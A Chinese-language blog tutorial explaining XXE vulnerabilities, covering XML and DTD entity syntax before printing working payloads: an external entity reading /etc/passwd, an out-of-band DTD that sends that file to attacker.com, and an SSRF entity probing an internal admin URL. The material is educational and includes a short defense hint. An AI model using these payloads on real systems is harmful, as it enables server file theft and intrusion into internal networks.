什么是XXE漏洞

原创已于 2025-03-29 15:29:29 修改 · 560 阅读

16 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

于 2025-03-29 02:30:39 首次发布

web漏洞同时被 2 个专栏收录

17 篇文章

订阅专栏

网络安全

10 篇文章

订阅专栏

文章目录

前言
1. XML
- 1.1 HTML文档
- 1.2 XML
2. XXE
3. 总结
参考

前言

假如没有学过完整的Web前后端开发，可能理解XXE会有点困难。究其原因，是因为我们知识的广度不够，接受新概念时觉得抽象难懂。我们常说代码/软件定义一切，正是软件提供了一个简易的平台让我们使用计算机，屏蔽了底层复杂的逻辑，与此同时，也引入了一些新的抽象概念。递归的去理解这些概念，什么、哪里才是我们的边界/基线呢？就是一门编程语言。

编程语言写出一个程序，允许我们实现某个功能。而程序在实现这个功能时，为了方便我们使用，又会引入一些新的抽象概念，用户根据这些概念和规范，输入数据，得到输出。即输入特定格式的数据（文本/字符串、二进制），软件读取，处理输出。

1. XML

1.1 HTML文档

我们先说HTML文档。其本质是一个文本文件，浏览器会读入文件，逐行解析文本，根据程序（浏览器）的预定义处理逻辑输出（展示文本内容）。为什么<h1>一级标题</h1>会被显示得很大呢，正是因为浏览器软件里面已经预定义了<h1></h1>这个字符串，处理这个标签里面得内容时会把解释为“一级标题”。

我们不仅可以使用标签来定义文档的结构，还可以在HTML文档中使用标签来引入CSS、JavaScript文件，浏览器会根据不同的标签元素进行不同的处理。

1.2 XML

XML（可扩展标记语言，eXtensible Markup Language），既然是语言，代表我们也可以写一段符合其语法的文本，交由程序（解释器/解析器）处理，比如：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE bookstore [
  <!ELEMENT bookstore (book+)>
  <!ELEMENT book (title, author, price)>
  <!ELEMENT title (#PCDATA)>
  <!ELEMENT author (#PCDATA)>
  <!ELEMENT price (#PCDATA)>
  <!ATTLIST book category CDATA "默认分类">
]>
<bookstore>
<book category="技术">
  <title>XML入门指南</title>
  <author>张三</author>
  <price currency="CNY">99.00</price>
</book>
</bookstore>

<!DOCTYPE 根元素 [……]>中的内容叫DTD（Document Type Define），类似HTML中浏览器解析<script src="http://www.hacker.com/shell.js"></script>，可以将Js代码写在标签体内，也可以将src属性中的资源加载进来交给Js引擎执行；DTD内容可以直接写在XML中（比如上述例子），也可以使用<!DOCTYPE 根元素 SYSTEM "文件路径/URL>"，将路径/URL中的DTD文件引入该XML文件中。至于什么是DTD，它和XML文件有什么关系，可以去b站看下XML相关教程或者问一下deepseek。

DTD文件中可以定义“实体”，或者可以说是变量，本质上是定义一个可复用的数据块，也就是说用一个字符串名称指定一个资源，实体可分为2种类型，通用实体和参数实体，两者可在文件中定义，也可引用外部数据资源，其语法格式如下：

<!-- 通用实体：在XML文件中引用，引用格式：&实体名;  -->
<!ENTITY 实体名 "实体值">             				 <!-- 内部实体 -->
<!ENTITY 实体名 SYSTEM "文件/URL">   				     <!-- 外部实体 -->

<!-- 参数实体：DTD文件自身使用 ，引用格式：%实体名;  -->
<!ENTITY % 实体名 "实体值">							<!-- 内部实体 -->
<!ENTITY % 实体名 SYSTEM "文件/URL">   				<!-- 外部实体 -->

2. XXE

2.1 原理

XXE（XML External Entity）漏洞的本质是利用 XML 解析器对外部实体的加载功能，通过构造恶意实体实现攻击。其攻击路径可分为两类：
在这里插入图片描述

2.2 直接外部实体引用（经典 XXE）

示例：直接读取服务器本地文件

<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

攻击结果：若服务器返回 &xxe; 的内容，则 /etc/passwd 文件被泄露。
防御：禁用外部实体（如设置 disallow-doctype-decl）。

2.3 恶意 DTD 文件攻击（进阶 XXE）

当直接外部实体被禁用时，攻击者可能通过 引用外部 DTD 文件中的参数实体 绕过限制。

攻击步骤

构造恶意 DTD 文件
托管在攻击者服务器（http://attacker.com/malicious.dtd）：

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%payload;'>">
%param;
%exfil;

解析逻辑：
- %，字符引用，0x25代表Unicode编码中的%
- % payload 读取 /etc/passwd。
- % param 定义嵌套实体 %exfil，将数据外传到攻击者服务器。
- % exfil; 触发 HTTP 请求。

诱导服务器解析恶意 XML

<!DOCTYPE data SYSTEM "http://attacker.com/malicious.dtd">
<data>123</data>

结果：服务器解析时加载外部 DTD，执行参数实体攻击链，导致数据外泄。

为何更危险？

绕过防御：部分解析器仅禁用通用实体（&xxe;），但允许参数实体（%param;）。
隐蔽性：数据通过带外（Out-of-Band）传输，无回显也能窃取信息。

2.4 SSRF

无论是直接外部实体还是恶意 DTD，只要 XML 解析器发起 未经授权的网络请求，均可能导致 SSRF。例如：

<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://内网IP:8080/admin">
]>
<data>&xxe;</data>

结果：服务器向内部服务http://内网IP:8080/admin发起请求，攻击者可探测或攻击内网系统。

3. 总结

说了这么多，无非就是Web应用前后端通信使用XML格式的字符串，后端语言会解析接收到的XML文本提取数据。我们通过构造一个恶意的XML，利用 XML 解析器对外部实体的加载功能进行攻击。

参考

[1] XML教程
[2] W3school DTD教程
[3] 小迪安全v2023
[4] deepseek